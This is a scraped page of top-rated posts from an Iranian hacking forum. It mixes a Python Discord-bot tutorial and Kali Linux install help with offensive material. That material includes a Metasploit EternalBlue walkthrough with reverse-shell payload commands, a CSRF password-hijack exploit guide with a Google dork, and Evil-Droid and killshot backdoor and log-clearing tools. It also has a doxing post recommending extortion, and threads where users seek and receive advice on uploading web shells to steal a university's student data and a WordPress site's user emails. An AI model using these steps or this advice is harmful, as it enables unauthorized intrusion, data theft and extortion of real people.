رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

تخته امتیازات

  1. MrExploit

    MrExploit

    کاربر تازه‌وارد


    • امتیاز

      15

    • ارسال ها

      111


  2. adaweb

    adaweb

    کاربر تازه‌وارد


    • امتیاز

      9

    • ارسال ها

      9


  3. mmj-sys

    mmj-sys

    کاربر رسمی


    • امتیاز

      9

    • ارسال ها

      211


  4. DeMoN

    DeMoN

    مدیر ارشد


    • امتیاز

      6

    • ارسال ها

      2,564


مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز در 04/03/2021 در همه بخش ها

  1. سلام به همه اعضای عزیز گارد ایران چند دقیقه پیش از سر عصبانیت یه حرفی زدم که الان پشیمونم 😐 تصمیم گرفتم تا در این تاپیک بهتون یاد بدم چطور یک ربات دیسکورد با زبان دوستداشتنی پایتون بسازیم خب اول از همه اینکه توی ۸ درس خواهد بود که هر درس ۲ بخش خواهد داشت 😐 هر هفته سعی میکنم ۲ تا درس رو تموم کنم تا راحت بشیم توی این دوره قراره از صفر صفر کار کنیم ولی کسایی که دارن این آموزش رو میبینن بهتره از قبل یکم درک از زبان پایتون داشته باشن تا کارشون راحت تر باشه کتابخونه های مورد استفاده : Discord Random همین ! 😐 خب کسایی که پایتون رو سیستمشون نصب باشه و کمی با زبان پایتون آشنایی داشته باشن میدونن pip چی هست خلاصه اینکه کتابخونه مورد نیازش رو نصب کنید تا جلسه بعدی بدرود
    4 امتیاز
  2. اگر بخواید میتونید به صورت لایو بالا بیارید بدون نصب در مرحله اول نسخه لایو رو از سایت کالی دانلود و روی فلش با نرمافزار روفوس بوتیبل کنید سپس فلش رو به پورت متصل کنید . و سعی کنید قبل از خوردن بوق بایوس به تنظیمات بایوس برید . با یکی از کلید ها مثل f10 , f12 , f11 , del , win , esc که معمولا دکمه دیلیت هست این دکمه با توجه به مدل بایوس و مادربرد میتونه متفاوت باشه وقتی وارد ستاپ شدید به بخش بوت برید و گزینه اول رو مساوی با ریموت دیوایس یا usb 1 قرار بدید احتمالا برای شما متفاوته باید یه همچین چیزی باشه بعد گزینه اف ۱۰ رو بزنید تا سیو بشن اگر خارج نشدید باید از دکمه Esc استفاده کنید بعد کالی بوت میشه در گزینه ها از لایو استفاده کنید اگر مایل به ذخیره تغییرات هستید اموزش های زیادی برای پرسیستنت کردن کالی وجود داره خب اگه مابل به دوال بوت هستید میتونید یکی از پارتیشن ها رو بعد از بکاپ گیری حذف کنید تا free space بشن بعد در هنگام پارتیشن بندی نصاب خودتون دستی پارتیشن بندی کنید
    4 امتیاز
  3. خب جلسه اول استارت شد : شما همونطور که گفتم باید کتابخونه Discord رو داشته باشید بریم سراغ کارمون : import Discord from Discord.ext import Commands بعد از اون یک prefix تعریف میکنیم که مشخص کنه کامنت بات چطور فراخوانی بشه : یعنی برای مثال : .Command و یا $Command ناگفته نماند prefix رو میشه هرچیزی تعریف کرد یعنی : Guardiran-help هرچیزی خب برای تعریف کردنش : import Discord from Discord.ext import Commands client = commands.Bot(command_prefix='.') ما در اینجا دات [ . ] تعریفش کردیم شما میتونید چیز دیگه ای تعریف کنید خب حالا از این به بعدش کار اصلیمون هست برای اینکه وقتی ربات ران شد مطمعن بشیم از event استفاده میکنیم به این صورت : import Discord from Discord.ext import Commands client = commands.Bot(command_prefix='.') @client.event async def on_ready(): print("Robot Run Shod") الان در صورتی که ربات ران بشه اولین کاری که میکنه توی محیط کنسول مینویسه Robot Run Shod خب حالا بریم اولین کامنتمون رو بنویسیم برای مثال ما میخوایم یه کامنت بنویسیم که در صورتی که کاربر نوشت .salam ربات بنویسه [سلام گارد ایران] کد : import Discord from Discord.ext import Commands client = commands.Bot(command_prefix='.') @client.event async def on_ready(): print("Robot Run Shod") @client.Commands() async def salam(ctx): await ctx.send("سلام گارد ایران") خب تا الان فهمیدیم چطوری میشه یه کامنت ادد کرد حالا بریم سراغ ران کردن ربات همونطور که میدونید شما نیازمند یه توکن هستید برای ران کردن ربات طریقه بدست آوردن توکن رو پست بعدی میزارم که این شلوغ نشه ❤️
    3 امتیاز
  4. سلام آرمین جان یه مقدار توضیحاتت ناقصه. این مقاله کوتاه چیزی که شما میگی رو توضیح میده. البته اگر به ترمینال دسترسی داری می تونی یه کارایی بکنی. اگر مشکلت رفع شد که هیچی. اما اگر نشد من احتمال میدم رابط گرافیکی نصب نکردی یا کارت گرافیک دستگاه با سیستم عامل همخوانی نداره. مقاله که دادم در موردمشکل کارت گرافیکه. پست زیر هم برای @R3dC0d3r هستش، در مورد رابط گرافیکیش توضیح داده. موفق باشید.
    3 امتیاز
  5. خب خب بریم سراغ ادامه آموزش قرار بود که بهتون بگم چطور میشه یه توکن گرفت ابتدا باید توی مرورگر وارد اکانت دیسکوردتون بشید Discord.app یا Discord.comهمشون یکین و ریدایرکت میدن لاگین که کردید برید به Developer Portal یعنی : [Hidden Content] سپس یه اپلیکیشن جدید بسازید (منظور همون ربات هست توی Discord Developer با عنوان اپلیکیشن شناخته میشه 😐 ) 2021-04-03 15-42-18.mkvآموزش ساخت اپلیکیشن به صورت تصویری : ببخشید که با فرمت mp4 نشد خب بریم سراغ ادامش توکن رو که کپی کردید برگردید به سورس کد و در خط آخر اضافه کنید : client.run(TOKEN) به جای TOKEN , توکن ربات خودتونو قرار بدید توی آموزش بعدی درباره نحوه ساخت یه ربات که رنگ اسم کاربر هارو هر ۵ ثانیه یه بار تغییر میده صحبت خواهیم کرد تا آموزش بعدی Bye
    2 امتیاز
  6. خیر تمامی ابزار ها به صورت ئیشفرض نصب هستن کالی به صورت کامل بالا میاد ولی ممکنه کمی سرعتش کم باشه
    2 امتیاز
  7. من رو HP تست کردم و در تنظیمات بایوس بخشAdvance میتونید این گزینه رو ببینید ولی فکر کنم کمتر سیستمی هستش که از مجازی ساز پشتیبانی نکنه 😐
    2 امتیاز
  8. احتمالا گراب در مسیر درست نصب نشده گراب رو در این مسیر نصب کنید /dev/sda/
    2 امتیاز
  9. با سلام خدمت دوستان این تاپیک رو برای این ایجاد کردم تا دوستان سوالاتی که درباره ارورها و مشکلاتی که در کالی لینوکس براشون پیش میاد رو اینجا بپرسن و به هیچ وجه در تاپیک آموزش سوال نپرسید موفق باشید
    1 امتیاز
  10. با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : [Hidden Content] چند نکته مهم :‌ لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .
    1 امتیاز
  11. سلام اصلا اینطور نیست. دلیلی نداره این اتفاق بیوفته. مگر اینکه ویندوز هم در کنار کالی نصب کنید، این دو سیستم عامل کاملا متفاوت از هم می باشن و استفاده از هردو ممکنه به دستگاه آسیب های جزئی وارد بکنه. کالی لینوکس حرفه ایه! جدیدا هر کسی می خواد پا تو این عرصه بزاره اولین کاری که میکنه کالی نصب می کنه. بعضی ها میرن دستورات یا کد ها رو از جای دیگه کپی پیست میکنن، در حالی که هیچ آگاهی خاصی نسبت به اون دستورات ندارند. کسی که کالی لینوکس رو به عنوان سیستم عامل اصلی نصب میکنه باید حداقل سطح علمیش تو رنج متوسط به بالا باشه. در غیر اینصورت فرد داره وقت خودش رو تلف میکنه. نمیگم کالی برای مبتدی ها نیست! من خودم اولین کاری که کردم همین بود. اوایل شروع ورودم به این حوزه رفتم بدون هیچ آگاهی کالی رو نصب کردم و به اشتباه تمام اطلاعات سیستمم رو از دست دادم و از اونجایی که دیدم فعلا این کارا برام زوده دوباره به ویندوز پناه اوردم! ولی اگر کسی واقعا بخواد برنامه نویسی یا تست نفوذ انجام بده و بتونه خوب خودش رو مدیریت کنه، میتونه از کالی بهترین استفاده رو بکنه. اینطور خیلی هم خوب میشه، چون از صفر با کالی شروع کرده در آینده کارش خیلی جلو میوفته و بعدا متوجه میشه چقدر خودش رو با این کار بالا کشیده. ولی در کل اگه از من نظر بخواین میگم از صفر با کالی شروع نکنین راحت ترین. آقا آرمین اینا رو کلی گفتم تا همه استفاده کنن، اگه تاپیکتون به هم خورد عذر میخوام. موفق باشید🌸🌷
    1 امتیاز
  12. فکر کنم فلش درست بوتیبل نشده برای حل این مشکل دوباره با نرمافزار روفوس استفاده کنید فرق این دو با هم اینه که گرافیکییه و ظاهر زیبایی داره میتونید از موس استفاده کنید دومی که اینستال خالی هست فقط یه پنجره بی کیفیت باز میشه و شما باید با کیبرد کارتونو راه بندازین
    1 امتیاز
  13. سلام وقت شما هم بخیر بله روی فلش بالا میاره و ربطی به مجازی ساز نداره اما اگه میشه بگید که موقع بالا آوردن روی مجازی چه اروری میده ممنون
    1 امتیاز
  14. سلام من برنامه زانتی را نصب کردم و گوشی هم روت شده ولی متاسفانه تند تند یک پیغام میاد و برنامه اجرا نمیشه zanti was benied superuser rights ممنون میشم کمکم کنید من ترکیه زندگی میکنم و خیلی به این برنامه احتیاج دارم
    1 امتیاز
  15. سلام دوست عزیز این رو امتحان کنید. sudo apt install openjdk-9-jdk-headless و بعدش /sudo rm -r ~PATH/Evil-Droid-master رو بزنید ببینید بعد برید اینجا و جدیدش رو دانلود کنید و بعد بزنید. /unzip master && cd Evil-Droid-master و سپس بزنید sudo chmod +755 evil-droid && ./evil-droid ببینید درست میشه یا نه اگر درست نشد دوباره بگید تلاش کنیم درستش کنیم خیلی ها این مشکل رو دارن.
    1 امتیاز
  16. backpack

    Doxing چیست؟

    توضیحات: Doxing روشی بسیار رایج است که توسط هکرها برای به دست آوردن اطلاعات حساس در مورد تارگت خود استفاده می شود. اگر شانس شما خوب باشد و تارگت در کار کردن با فضای مجازی و شبکه های اجتماعی ضعیف عمل کند، اطلاعات حساس و کاربردی او را خواهید داشت. تصور کنید می خواهید ویروسی به کسی بدهید و او را نمی شناسید و فقط از طریق نصب ویروسی روی دیوایس تارگت می توانید به دیوایس او دسترسی داشته باشید، خب شما هرچقدر اطلاعات بیشتری در مورد تارگت داشته باشید کار شما راحت تر خواهد بود. (دقت داشته باشید این موضوع با Osint فرق می کنه) Doxing چگونه انجام می شود؟ روش های زیادی برای داکسینگ وجود داره. متداول ترین روش، استفاده از ابزارهای doxing مثل speye است. در doxing ، نام تارگت ها را در پایگاه داده شرکت های بزرگ جستجو می کند و اگر شخص واقعی را پیدا کند به شما نمایش میدهد؛ اما این تنها روش نیست و شما می توانید با زحمت بیشتر از راه های دیگری اقدام کنید.(البته Doxing غیر قانونی نیست، گفتم که تصور بد ازش نداشته باشید) اگر بخواهیم Doxing یا Doxxing را در یک جمله خلاصه کنیم می توانیم بگوییم «دستیابی به اطلاعات یک شخص بدون اینکه شخص بداند شما درمورد او اطلاعاتی را جمع آوری می کنید» من 6 سایت معروف رو در این زمینه معرفی می کنم: 1. intelligence X_ شما در این سایت قادر هستید در بین Domain ، URL، Email، IP، CIDR، Bitcoin address ها جست و جو کنید. 2. whitepages در این سایت می توانید بر اساس نام و نام خانوادگی، شهر، زیپ کد(کد پستی) ، شماره تلفن و موارد این چنینی جست و جو کنید. 3. have i been pwned وب سایتی است که به کاربران اینترنت اجازه می دهد تا بررسی کنند آیا داده های شخصی آنها به دلیل نقض داده ها به خطر افتاده است یا خیر. 4. emailrep این هوش مصنوعی کاربرد خیلی زیادی دارد. شما می توانید ببینید که ایمیل مورد نظر در کدام شبکه های اجتماعی فعالیت دارد ( ... - Facebook - GitHub- Instagram ) 5. dehashed این وب سایت هم برای بررسی ایمیل است اما به پای emailrep نمی رسد. 6. thatsthem این وب سایت برای پیدا کردن فرد مورد نظرتان طراحی شده که بر اساس: نام ، شهر ، خیابان ، زیپ کد(آدرس) عمل می کند. بعضی کشور با هدف ایجاد شفافیت و موضوعات اینچنینی، اقدام به این کار ها می کنند. ایران شامل این موضوع نمی شود. یکی از اولین وقایع این عمل انتشار لیست سیاه Net.Nazis و Sandlot Bullies بود که در آن اسامی ، آدرس های ایمیل ، شماره تلفن ها و آدرس های پستی افرادی که نویسنده به آنها اعتراض کرده بود ذکر شده است. باج زدن با روش Doxing وقتی سیستمی را باج می زنند برای حفظ اطلاعات از او درخواست باج می کنند. اما وقتی ویروسی را با نوع Dox به تارگت می دهیم برای انتشار ندادن اطلاعات و محتوای دیوایس تارگت از او طلب باج می کنیم. این دو می تواند خیلی با هم فرق داشته باشند؛ شما می توانید از این روش برای باج زدن استفاده کنید زیرا در این صورت فرد اگر اطلاعات محرمانه ای داشته باشد(که اکثر مردم دارند) احساس خطر کرده و مجبور به پرداخت باج می شود. امیدوارم که از این مطلب راضی بوده باشید🌺🌹
    1 امتیاز
  17. ویدئوی بیست و یکم + صدا .
    1 امتیاز
  18. R3DN4X314

    نفوذ با kill shot

    killshot یک فریم ورک تست نفوذ محسوب میشه که ابزار بدست اوردن اطلاعات و اسکنر حفره های امنیتی وبسایت هم داره این فریم ورک از اسپایدر ها برای جمع کردن اطلاعات مهم از سایت مورد نظر استفاده میکنه و در صورت تشخیص سیستم مدیریت محتوا ، به دنبال کشف نوع cms میره و بعد از کشف نوع و ورژن سیستم مدیریت محتوای سایت با استفاده از اکسپلویت اسکنر به دنبال اکسپلویت برای نفوذ به سایت میگرده همچنین به دنبال انواع اسیب پذیری روی سایت و وب اپلیکیشن هاش میگرده توانایی متصل شدن به nmap و unicorn یکی دیگه از نکات جالبشه با استفاده از killshot شما میتونید بک دور های php بسازید ، اپلود کنید و بهش وصل بشید و حتی برای پاک کردن ردپا هم کاربرد داره و خیلی چیزای جالب دیگه در قسمت زیر منوی برنامه و زیر بخش هاشو میتونید ببینید ، و در انتها لینک دانلود و نحوه استفاده رو براتون میزارم {0} Spider {1} Web technologie {2} WebApp Vul Scanner {3} Port Scanner {4} CMS Scanner {5} Fuzzers {6} Cms Exploit Scanner {7} Backdoor Generation {8} Linux Log Clear webapp vul scanner {1} Xss scanner {2} Sql Scanner {3} Tomcat RCE port scanner [0] Nmap Scan [1] Unicorn Scan Nmap Scan [2] Nmap Os Scan [3] Nmap TCP Scan [4] Nmap UDB Scan [5] Nmap All scan [6] Nmap Http Option Scan [7] Nmap Live target In Network Unicorn Scan [8] Services OS [9] TCP SYN Scan on a whole network [01] UDP scan on the whole network backdoor generation {1} Generate Shell {2} Connect Shell دانلود و نحوه استفاده git clone [Hidden Content] [Hidden Content]
    1 امتیاز
  19. دوست عزیز یه تاپیک برای تارگت های تمرینی sql injection داریم این تاپیک برای تارگت هایی هست که به صورت ویدئویی انجام شده و در هرکدام یه نکته وجود دارد ممنون میشم مدیران دو پاسخ اسپم رو پاک کنند . شما هم زحمت بکش این پاسخت رو کپی کن و توی تارگت های sql injection انتقال بده . و یا اینکه به صورت ویدئویی ارایه بده و این متنی رو پاک کن .
    1 امتیاز
  20. MR.MSA

    اکسپلویت باگ CSRF

    با سلام خدمت دوستان عزیز گارد ایران من MR.MSA در این تاپیک قصد دارم یک اکسپلویت در باگ CSRF رو به شما معرفی کنم و کمی توضیح درباره این باگ برای مبتدی ها ، با من همراه باشید . -------------------- CSRF : Cross Site Request Forgery نکات باگ : معنی شده آن جعل درخواست است . این باگ را کرم تحت وب می شناسند و اثر بدی دارد . این باگ توسط سایت و فایروال شناسایی نمی شود . -------------------- نحوه حمله : این حمله به طوری است که ما با استفاده از جعل کوکی admin سایت می توانیم درخواست های جعلی بدهیم . -------------------- انجام حمله : قدم اول : گوگل دورک Google Dork : inurl:admin/admin.php Travel PORTAL ---------- قدم دوم : اکسپلویت به این ادرس بروید و اکسپلویت رو با پسوند html ذخیره کنید . exploit : [Hidden Content] ---------- قدم سوم : به جای [Hidden Content] آدرس سایت خود را بزنید => [Hidden Content] قدم چهارم : رمز جدید خود را بزنید . ----------------------------- امید وارم از این تاپیک لذت برده باشید و اکسپلویت مورد تایید شما قرار گرفته باشه . اگه مشکلی داشت به خوبی خودتون ببخشید سعی کردم تاپیک رو جوری بنویسم که همه بتوانند استفاده کنند . ******************** MR.MSA ***************** <------------------------MR.MSA----------------------> -------- پیج فیک ------- <صفحه لاگین اینستاگرام (فیک)> ------- باگ -------- <آموزش متد polygon در sql injection > <آموزش متد join در sql injection > <نکته مهم در متد join > ------- افزونه -------- <افزونه Wapplyzer (اسکنر سایت ) > <افزونه اسکن سایت های wordpress> <افزونه whatruns (جمع آوری اطلاعات سایت)> <------------------------MR.MSA----------------------/>
    1 امتیاز
  21. index.htmlبا سلام خدمت اعضای محترم تیم بزرگ گارد ایران بنا بر پیشرفت بخش دیفیس تیم ، دیفیس پیج اختصاصی گاردایران با دقت و جزئیات توسط اینجانب طراحی شده ؛ به جهت یکپارچگی ، تمامی دیفیسر های محترم مجاب به استفاده از این پیج می باشند . - لینک های مهم دمو مخزن گیت هاب index.html
    1 امتیاز
  22. سلام داری اشتباه میزنی عزیز من apt-get install tor بعد این هم باید تو سورس لیست خودتون سورس تور اضافه کنید و ... من متاسفانه جایی هستم نمیتونم درست توضیح بدم اما دستور نصب براتون گذاشتم موفق باشید
    1 امتیاز
  23. سلام خدمت عزیزان گارد ایران.برگشتم با یک ابزار کاربردیه دیگه.ابزار هیدن کننده آی پی که هر هکری مورد نیازشه که آی پیش مخفی باشه.به همین خاطره که. میگیم we are anonymous.خخخخ.خوب امیدوارم از این ابزار لذت ببرین. در ضمن تشکرهم یادت نره. Pass:guardiran.org از مدیر عزیز هم شرمنده که مجبور میشن گاهی اوقات پست های بنده رو ویرایش کنن. این دو تا پست رو خودتون لطف کنید یک جایی براش پیدا کنین.تشکرررررر "پست ویرایش شده" Super Hide IP v3.2.4.6.rar
    1 امتیاز
  24. سلام دوستان. امروز میخوایم با استفاده از اکسپلویت که جدیدا برای متاسپلویت اومدی سیستم عامل های درون شبکه خودمون رو هک بکنیم! خوب برای این کار اول اکسپلویت رو انتخاب میکنیم use exploit/windows/smb/ms17_010_eternalblue خوب حالا باید یک پیلود ست کنیم set PAYLOAD windows/meterpreter/reverse_tcp حالا اول ایپی سیستم خودمون و بعد ایپی سیستم تارگت رو وارد میکنیم set LHOST آیپی سیستم هکر set RHOST آیپی سیستم تارگت و حالا باید یک پراسس انتخاب بکنیم set ProcessName explorer.exe خوب حالا اگه دستور exploit رو بزنید به سیستم تارگت وصل میشید امیدوارم خوشتون اومده باشه موفق باشید خدا نگهدار💙
    1 امتیاز
  25. با سلام خدمت دوستان و اساتید عزیز بنده نیاز به ایمیل تمام کاربران یک سایتی دارم که از cms وردپرس استفاده میکنه برای این کار فک کنم باید دیتابیسش رو داشته باشم بنده چیزی از هک سر در نمیارم لطفا به صورت واضح و ساده بگید سپاس
    1 امتیاز
  26. خوب چجوری نفوذ کنم من از عمد سایت بزرگی از این حیونا میخوام داغون کنم
    1 امتیاز
  27. اگ با نسخه کرک شده اکانتیکس اسکن کردی ک باید بگم اون csrf اشتباهه تارگت بزرگی برداشتی از اسکنرای دیگه هم استفاده کن اگ باگی پیدا نکردی میتونی سایت های روی سرور رو بررسی کنی و از طریق اونا نفوذ رو انجام بدی یا اینکه ب سرور نفوذ کنی ک کار منو تو نیس
    1 امتیاز
  28. سلام دوستان و استادان من یک سایتی از این ال سعود میخوام هک کنم دانشگاه هاشون هست خیلی براشون مهمه بعد این سایت فقط 22تا البته دوتا هست اون بغل که نوشته بغل باگ نارنجی نوشته 22 باگ نارنجی داره با برنامه Acunetix Web Vulnerability Scanner 9که اسکن کردم چجوری میشه هکش کرد باگ sqlنداره اصلا باگ برای این سایت چجوری میخوام اطلاعات تمام این دانشجوهاشون رو بگیرم دست خودم
    1 امتیاز
  29. سلام. تارگت رو با دسترسی پ.خ کنید تا بررسی بشه. موفق باشید
    1 امتیاز
  30. اول یک عکس بزن ببین آدرسی که آپ میشن چیه بعد میتونی اونجا دنبال شل بگردی نتونستی بده برات پیدا کنم موفق باشید
    1 امتیاز
  31. با سلام میخوام ایمیل تمام کاربران یک سایت وردپرسی رو برام دربیارین لطفا هزینش رو هم بگید در خصوصی ممنون
    1 امتیاز
  32. من الان وارد سایت [Hidden Content] شدم بعد تو بخش ویرایش کاربری به جای آپلود عکس اون شلمو آپلود کردم بعد ارور میده حالا چجوری باید به اون صفحه شلم دست پیدا کنم ؟ همین اوکی بشه حله ممنون
    1 امتیاز
  33. من الان وارد سایت [Hidden Content] شدم بعد تو بخش ویرایش کاربری به جای آپلود عکس اون شلمو آپلود کردم بعد ارور میده حالا چجوری باید به اون صفحه شلم دست پیدا کنم ؟ همین اوکی بشه حله ممنون
    1 امتیاز
  34. به نظر شما برای سیستم وردپرس از چه شلی استفاده کنم ؟ شل c99 خوبه ؟ و یک سوال دیگه تو این انجمن جایی هست که توضیح داده باشه چجوری شل رو آپلود کنم ؟ برای به دست آوردن دیتابیس باید شل رو برم یک جایی از هاستش آپلود کنم ؟
    1 امتیاز
  35. باید اول به سایت نفوذ کنید یا به یکی از سایت های روی سرور. بعد ازشون شل بگیرید. بعد از اینکه شل گرفتید آموز شهای لازمه برای نفوذ به دیتابیس (که ساده هست)در نت وجود داره. موفق باشید
    1 امتیاز
  36. خب چجوری به صورت مستقیم به دیتابیس نفوذ کنم ؟
    1 امتیاز
  37. ذکر کردم خدمتتون. شما اگر نتونستین با ابزار های کاری انجام بدین یا باید به طور مستقیم به سایت نفوذ کنین و از دیتابیس ایمیل هارو استخراج کنید یا اینکه به یکی از سایت های روی سرور نفوذ کنید و سیملینک بزنید و و به دیتابیس نفوذ کنید. موفق باشید
    1 امتیاز
  38. آدرس سایتش : [Hidden Content]
    1 امتیاز
  39. ممنون از راهنماییتون رفتم نرم افزارو دانلود کردم وقتی سرچ میکنه میره تو صفحات سایت دنبال ایمیل ها میگرده خب این سایتی که میخوام ایمیلاشو بدست بیارم ، ایمیل کاربراشو نشون نمیده چی کار کنم به نظرتون ؟
    1 امتیاز
  40. ببینید همین یک راه نیست.راه زیاده ولی بستگی به سایت هدف داره. به عنوان مثال اگر امنیت پایین باشه میشه با نرم افزار های ساده ای که در گوگل هم هست ایمیل هارو استخراج کرد به عنوان مثال به لینک زیر برید لینک ولی نفوذ به دیتابیس همیشه و بلا استثنا جواب میده. موفق باشید
    1 امتیاز
  41. خب میشه بیشتر راهنمایی کنید تا بتونم ایمیلارو بدست بیارم فقط دیتا بیس رو داشته باشم کافیه
    1 امتیاز
  42. سلام. راه هایی که میشه تستشون کرد و عملی هستن 1-نفوذ به دیتابیس سایت و استخراج ایمیل های سایت 2-اسکریپتی وجود داشته باشه برای CMS موردنظرتون که بتونه ایمیل هارو استخراج بکنه. موفق باشید
    1 امتیاز
  43. درود دوست عزیز اینکه برنامه شما به این صورت در اینجا قرار گرفت مقصر خود شما هستین. چون اگر واقعا برای سایت خاصی نوشتین اسم سایت رو در برنامه ذکر میکردن. چون شاید دوستان که برنامه رو دانلود کردن از سایت مورد نظر شما دانلود نکرده باشن. لطفا در برنامه های بعدیتون یک نام و نشانی از سایت و خودتون بگذارید که دچار مشکل نشین. موفق باشید
    1 امتیاز
  44. سلام اول از همه باید بگم این تاپیک برای پرسیدن سوال در مورد خطاها هست، نه مشکلات اینچنینی. و در مورد سوالتون، می تونید از یه سرور مجازی یا Ngrok استفاده کنید. آموزش ها در اینترنت هست و با یه سرچ ساده پیدا میشه، پس توضیح اضافه نمیدم. می تونید در مورد پورت فورواردینگ تحقیق کنید، می تونه کمکتون کنه. بهترین راه استفاده از سرور مجازیه، می تونید کرک کنید، یا بخرید! (کرک سرور های ایرانی های مجاز نمی باشد) یقیناُ به خوبی با کالی آشنایی ندارید؛ بهتره به جای اینکه با یه فیلم آموزشی پیش برید، برید و در مورد متاسپلویت و نحوه کار کردن پیلود ها و .... تحقیق کنید و بفهمید چطور کار می کنه، تا هر مشکلی پیش اومد بفهمید باید چکار کنید. proxy وقتی تاپیک رو زد نوشت که چی باید در این تاپیک قرار بگیره و چی قرار نگیره. برای پرسش اینجور سوال ها، تاپیک بزنید و در اونجا سوالتون رو مطرح کنید. شاد باشید🌺
    0 امتیاز
×
×
  • ایجاد مورد جدید...